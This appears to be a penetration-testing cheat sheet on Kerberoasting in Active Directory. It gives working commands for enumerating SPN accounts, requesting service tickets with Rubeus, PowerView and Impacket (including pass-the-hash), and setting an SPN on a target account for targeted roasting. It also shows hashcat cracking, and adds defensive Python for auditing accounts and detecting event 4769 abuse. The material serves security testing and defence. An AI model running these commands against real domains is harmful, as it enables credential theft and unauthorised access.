👾 Overview

Kerberoasting is an attack that abuses the servicePrincipalName (SPN) attribute of Active Directory user accounts: any authenticated domain user can request TGS (service) tickets for those accounts. Each ticket is encrypted with a key derived from the service account's password, so the tickets can be cracked offline.

🔍 Discovery

Requirements:

  • Any valid domain account
  • A user with a ServicePrincipalName that is not null

Windows enumeration:

# Using PowerView to find vulnerable accounts
Get-NetUser | Where-Object {$_.servicePrincipalName} | fl
 
# Using PowerShell to find vulnerable accounts
Get-ADObject -Filter * -Properties servicePrincipalName,cn | Where-Object {$_.servicePrincipalName -ne $null -and $_.distinguishedName -like "*CN=Users*" -and $_.cn -ne "krbtgt"}
 
# Using Rubeus to find vulnerable accounts
.\Rubeus.exe kerberoast /stats
 
# Builtin binary
setspn.exe -Q */*

Linux enumeration:

# Using ldapsearch to find kerberoastable users
ldapsearch -LLL -x -H ldap://[IP] -D "[USERNAME]" -W -b "dc=[DOMAIN],dc=[TLD]" "(&(&(servicePrincipalName=*)(userAccountControl:1.2.840.113556.1.4.803:=512))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"
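The ldapsearch filter above is compact but easy to misread. The OID 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule, 512 is the NORMAL_ACCOUNT bit of userAccountControl (so computer and trust accounts drop out) and 2 is the ACCOUNTDISABLE bit (so disabled accounts such as krbtgt drop out). The following script is an added example, not code from the original page: it re-implements that filter logic in Python over a constructed, hypothetical set of directory objects, so a defender can audit an LDAP export offline and see exactly which accounts the filter would match. The object records, names and SPNs are constructed for illustration.

```python
"""Offline audit of which directory objects a Kerberoasting LDAP filter matches.

Added example (not from the original page). Mirrors the filter
(&(servicePrincipalName=*)(userAccountControl:1.2.840.113556.1.4.803:=512)
 (!(userAccountControl:1.2.840.113556.1.4.803:=2))) on local data.
"""

# userAccountControl flag bits (documented values of the AD attribute)
ADS_UF_ACCOUNTDISABLE = 0x0002   # decimal 2
ADS_UF_NORMAL_ACCOUNT = 0x0200   # decimal 512


def bit_and_match(value: int, mask: int) -> bool:
    """Emulates LDAP_MATCHING_RULE_BIT_AND (OID 1.2.840.113556.1.4.803):
    matches when every bit of `mask` is set in `value`."""
    return (value & mask) == mask


def is_kerberoastable(obj: dict) -> bool:
    """True when the object would be returned by the ldapsearch filter:
    has at least one SPN, is a normal user account, and is not disabled."""
    spns = obj.get("servicePrincipalName") or []
    uac = int(obj.get("userAccountControl", 0))
    return (
        len(spns) > 0
        and bit_and_match(uac, ADS_UF_NORMAL_ACCOUNT)
        and not bit_and_match(uac, ADS_UF_ACCOUNTDISABLE)
    )


def audit(objects) -> list:
    """Return the sorted sAMAccountNames that the filter would match."""
    return sorted(o["sAMAccountName"] for o in objects if is_kerberoastable(o))


# Constructed sample export (hypothetical domain EXAMPLE.LOCAL, not real data)
SAMPLE_OBJECTS = [
    # normal account with an SPN and DONT_EXPIRE_PASSWD (0x10000): matched
    {"sAMAccountName": "svc_sql",
     "servicePrincipalName": ["MSSQLSvc/db01.example.local:1433"],
     "userAccountControl": 0x10200},
    # normal account with an SPN but ACCOUNTDISABLE set: excluded
    {"sAMAccountName": "svc_old",
     "servicePrincipalName": ["HTTP/old.example.local"],
     "userAccountControl": 0x0202},
    # normal account without any SPN: excluded
    {"sAMAccountName": "alice",
     "servicePrincipalName": [],
     "userAccountControl": 0x0200},
    # computer account: WORKSTATION_TRUST_ACCOUNT (0x1000), no NORMAL_ACCOUNT bit: excluded
    {"sAMAccountName": "WEB01$",
     "servicePrincipalName": ["HOST/web01.example.local"],
     "userAccountControl": 0x1000},
    # krbtgt is disabled by design: excluded
    {"sAMAccountName": "krbtgt",
     "servicePrincipalName": ["kadmin/changepw"],
     "userAccountControl": 0x0202},
]


if __name__ == "__main__":
    for name in audit(SAMPLE_OBJECTS):
        print(name)
```

Feeding a real export (for example the output of the ldapsearch command converted to the same dict shape) into `audit()` gives the list of accounts whose password strength is the only thing standing between a ticket request and a cracked credential; those are the accounts to move to long random passwords or group managed service accounts.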

📌 Exploitation

Windows:

# Using Rubeus
.\Rubeus.exe kerberoast /outfile:kerberoast.hash
 
# Rubeus with a user
.\Rubeus.exe kerberoast /outfile:kerberoast.hash /creduser:[DOMAIN]\[USERNAME] /credpassword:[PASSWORD]
 
# Using PowerView
Request-SPNTicket -SPN "[SPN]" -Format Hashcat

Linux:

# Password will be prompted
impacket-GetUserSPNs -request -dc-ip [IP] [DOMAIN]/[USER] -outputfile kerberoast.hash
# Pass the hash
impacket-GetUserSPNs -request -dc-ip [IP] -hashes [LMHASH]:[NTHASH] [Domain]/[USER]  -outputfile kerberoast.hash

If you encounter a Kerberos clock skew error, try this fix.

🎯 Targeted Kerberoast

Targeted Kerberoasting is used to obtain the password of one specific user. If an object holds elevated permissions over the target account, an attacker can add an SPN to that account, which makes it Kerberoastable.

🔍 Discovery

Requirements:

  • Any valid domain account
  • One of the following permissions over the target
    • GenericAll
    • GenericWrite
    • WriteProperty
    • Validated-SPN

Use Bloodhound to easily find users that are susceptible to this attack.

📌 Exploitation

  1. Authenticate as the user with one of the required permissions.

# Use a credential object if your session is not for the desired user
$SecPassword = ConvertTo-SecureString '[PASSWORD]' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('[DOMAIN]\[USERNAME]', $SecPassword)
 
# Set the SPN for the target account - uses PowerView
# Omit -Credential if not needed
Set-DomainObject -Credential $Cred -Identity [TARGET USERNAME] -Set @{serviceprincipalname='random/garbage'}

  2. Kerberoast the target as described above.
  3. Cleanup - remove the SPN

# Omit -Credential if not needed
Set-DomainObject -Credential $Cred -Identity [TARGET USERNAME] -Clear serviceprincipalname

✨ Post-Exploitation

Once a TGS is obtained, it can be cracked using hashcat to obtain the user’s password.

# Simple dictionary attack
# -m 13100 is the hashcat mode for Kerberos 5 TGS-REP etype 23 (RC4-HMAC)
hashcat -a 0 -m 13100 ./kerberoast.hash [wordlist]

🚔 Detection & Evasion

Kerberoasting generates the Windows security event 4769 - A Kerberos service ticket was requested.
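Event 4769 is extremely noisy on its own, since every service ticket request on a domain produces one. The detection sketch below is an added example, not part of the original page: it runs over a constructed export of 4769 records and flags a requester who successfully obtains tickets for several user-account SPNs (service names that are not computer accounts ending in `$` and not krbtgt) using RC4-HMAC, encryption type 0x17, which is what hashcat mode 13100 expects. The line format, account names, IP addresses and the threshold of three distinct services are assumptions made for the example; in a real SIEM the same logic would be applied to the parsed event fields over a time window.

```python
"""Detection sketch over constructed Windows Security event 4769 records.

Added example (not from the original page). Flags requesters that obtain
RC4-encrypted service tickets for several user-account SPNs.
"""
import re
from collections import defaultdict

RC4_HMAC = 0x17            # TicketEncryptionType for RC4-HMAC; AES tickets use 0x11/0x12
DEFAULT_THRESHOLD = 3      # assumed: distinct user SPNs per requester before alerting

# Constructed sample export, one event per line as key=value pairs.
# Hypothetical domain EXAMPLE.LOCAL; nothing here is real log data.
SAMPLE_EVENTS = """\
EventID=4769 TargetUserName=alice@EXAMPLE.LOCAL ServiceName=WEB01$ TicketEncryptionType=0x12 IpAddress=::ffff:10.0.0.5 Status=0x0
EventID=4769 TargetUserName=bob@EXAMPLE.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=::ffff:10.0.0.7 Status=0x0
EventID=4769 TargetUserName=bob@EXAMPLE.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=::ffff:10.0.0.7 Status=0x0
EventID=4769 TargetUserName=bob@EXAMPLE.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=::ffff:10.0.0.7 Status=0x0
EventID=4769 TargetUserName=carol@EXAMPLE.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:10.0.0.9 Status=0x0
EventID=4769 TargetUserName=dave@EXAMPLE.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=::ffff:10.0.0.11 Status=0x1b
"""


def parse_event(line: str) -> dict:
    """Split a key=value line into a dict of event fields."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def is_suspicious(ev: dict) -> bool:
    """A granted 4769 (Status 0x0) for a user-account SPN with RC4 encryption.

    Computer accounts (ServiceName ending in '$') and krbtgt are ignored:
    their tickets are not what Kerberoasting is after, and they dominate
    normal 4769 volume. Failed requests (non-zero Status) are ignored too.
    """
    svc = ev.get("ServiceName", "")
    try:
        etype = int(ev.get("TicketEncryptionType", "0x0"), 16)
    except ValueError:
        return False
    return (
        ev.get("EventID") == "4769"
        and ev.get("Status") == "0x0"
        and etype == RC4_HMAC
        and not svc.endswith("$")
        and svc.lower() != "krbtgt"
    )


def detect(text: str, threshold: int = DEFAULT_THRESHOLD) -> dict:
    """Return {requester: sorted distinct service names} for every requester
    that obtained RC4 tickets for at least `threshold` distinct user SPNs."""
    hits = defaultdict(set)
    for line in text.splitlines():
        ev = parse_event(line)
        if is_suspicious(ev):
            hits[ev["TargetUserName"]].add(ev["ServiceName"])
    return {user: sorted(svcs) for user, svcs in hits.items() if len(svcs) >= threshold}


if __name__ == "__main__":
    for user, services in detect(SAMPLE_EVENTS).items():
        print(f"possible kerberoasting by {user}: {', '.join(services)}")
```

Two caveats for anyone turning this into a production rule. First, the RC4 filter only works because service accounts that have AES enabled are issued 0x12 tickets, so an environment that still allows RC4 on service accounts is the one this catches; removing RC4 from those accounts (and from the domain's supported encryption types) both reduces the cracking risk and makes any remaining 0x17 ticket stand out. Second, a single request for a single SPN is not an alert on its own; the signal is one requester collecting tickets for many user SPNs in a short window, which is why the rule counts distinct service names per requester.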